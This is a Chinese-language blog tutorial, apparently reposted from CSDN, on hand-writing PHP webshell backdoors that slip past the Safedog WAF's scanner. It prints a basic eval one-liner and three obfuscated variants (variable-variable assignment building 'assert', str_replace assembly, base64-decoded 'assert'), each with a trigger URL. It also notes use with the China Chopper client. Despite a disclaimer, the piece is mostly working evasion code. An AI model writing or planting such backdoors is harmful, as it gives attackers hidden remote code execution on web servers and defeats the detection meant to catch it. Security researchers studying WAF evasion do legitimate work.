简单手写后门Safedog检测绕过

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
简介: 简单手写后门Safedog检测绕过

简单手写后门Safedog检测绕过今天继续给大家介绍渗透测试相关知识,本文主要内容是简单手写后门Safedog检测绕过。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、Safedog后门扫描原理
SafeDog等WAF软件通常具有网络木马扫描功能,如下所示:

如果我们在网站中存在一个文件,是PHP一句话木马,如下所示:

<?php
eval($_POST['a']);
?>
1
2
3
那么当SafeDog进行扫描时,就会扫描出该文件,如下所示:

二、Safedog后门扫描绕过
上述后门之所以被Safedog拦截,是因为SafeDog检测到了eval函数和上传命令结合在了一起,因此,我们需要想办法避免这种写法,同时还能实现后门的功能。
我们可以采用变量覆盖的方式来写后门,后门PHP代码如下所示:

<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_GET['z']);
?>
1
2
3
4
5
在上述代码中,并没有直接出现assert函数,因此,安全狗扫描也不会查杀,如下所示:

但是,我们可以采取如下payload:

http://127.0.0.1/test.php?x=b&y=assert&z=phpinfo();
1
上述payload执行结果如下所示:

如果使用菜刀等工具连接,z就是webshell的密码。分析上述URL,可以看出,在传入上述参数后,各个变量结果如下:

\$a=b
\$\$a=assert
1
2
因此$b=assert。因此上述代码变为:

assert(\$_GET['z'])
1
因此成为了一个webshell。
除了上述方式外,还有一些绕过WAF的思路,例如:
1、字符替换
字符替换是通过字符的替换,来代理敏感字符串,以绕过WAF的检测,相关PHP代码如下所示:

<?php
$a=str_replace('123','','as123ser123t');
$a($_GET['x']);
?>
1
2
3
4
对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();
1
2、字符编码
字符编码的方式是将敏感字符串进行字符编码后,然后再利用代码进行解码,然后就可以绕过WAF的检测了。相关PHP代码如下所示:

<?php
$a=base64_decode("YXNzZXJ0");
$a($_GET['x']);
?>
1
2
3
4
对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();
1
以上几种方式,获取不能直接绕过WAF的检测,但是我们可以借鉴这些写法的思想,形成更加复杂的webshell。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/weixin_40228200/article/details/128689303

目录
相关文章
|
15天前
|
网络协议 安全 网络安全
ssrf检测防御与绕过
ssrf检测防御与绕过
|
29天前
|
安全
【恶意代码系列】五、处理恶意代码主要步骤及总结
【恶意代码系列】五、处理恶意代码主要步骤及总结
|
5月前
|
安全 应用服务中间件 PHP
文件上传解析漏洞,以及检测方式的绕过
文件上传解析漏洞,以及检测方式的绕过
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
565 0
|
SQL XML 安全
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
🏆今日学习目标: 🍀学习了解sql注入漏洞
367 0
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
|
安全 Linux 开发工具
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
&gt;🍀1复习一下以前的内容 &gt;🍀2总结整合一下过滤方法
242 0
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
|
XML JSON 安全
IDOR测试常见绕过技巧小结
一、IDOR介绍 二、常见的测试技巧 1.改变HTTP请求方法 2.路径穿越绕过 3.改变Content-type(内容类型) 4.用数字ID替换非数字 5.大小写替换绕过 6.用通配符替换ID 7.给Web应用提供一个请求ID,哪怕它没作要求 8.HTTP参数污染,为同一参数提供多个值。 9.更改文件类型。添加不同的文件扩展名(例如`.json, .xml, .config`) 10.JSON参数污染 11.在请求体用数组包装参数值 12.尝试不同版本的API
184 0
|
安全 Ubuntu Linux
linux服务器木马后门rookit检测过程
在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。那这个是 check rookit。我们来看一下第二个工具,叫rookit hunter,这也是一个系统可以直接安装的工具。那安装完毕之后,执行这条命令就可以了,执行的过程我就不给大家讲了,你只要一路回车就可以了。重点是什么?重点是要会看结果。也就是说我们查询出如kite之后,那我怎么知道它是一个rookit?看这里边爆出来了,lookit。也就是说他做了一些这个隐藏,加入到内核里之后,看这都是挖点,说明已
234 0
linux服务器木马后门rookit检测过程
|
安全 前端开发 JavaScript
渗透测试 对文件上传安全检测与webshell分析
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,IOS端都采用的JSP+oracle数据库架构开发,前端使用VUE,服务器是linux centos系统.下面我们将渗透测试过程里,对文件上传漏洞的检测与webshell的分析进行记录,希望更多的人了解什么是渗透测试.
277 0
渗透测试 对文件上传安全检测与webshell分析
|
SQL 安全 数据安全/隐私保护
阿里云发现后门webshell文件 该如何解决处理
昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云盾看到有这样的一个安全提示“网站后门-发现后门(Webshell)文件”事件等级:紧急,影响资产:阿里云ECS:ID,然后贴出了网站木马文件的路径地址:/www/wangzhan/safe/indnx.php。
21186 0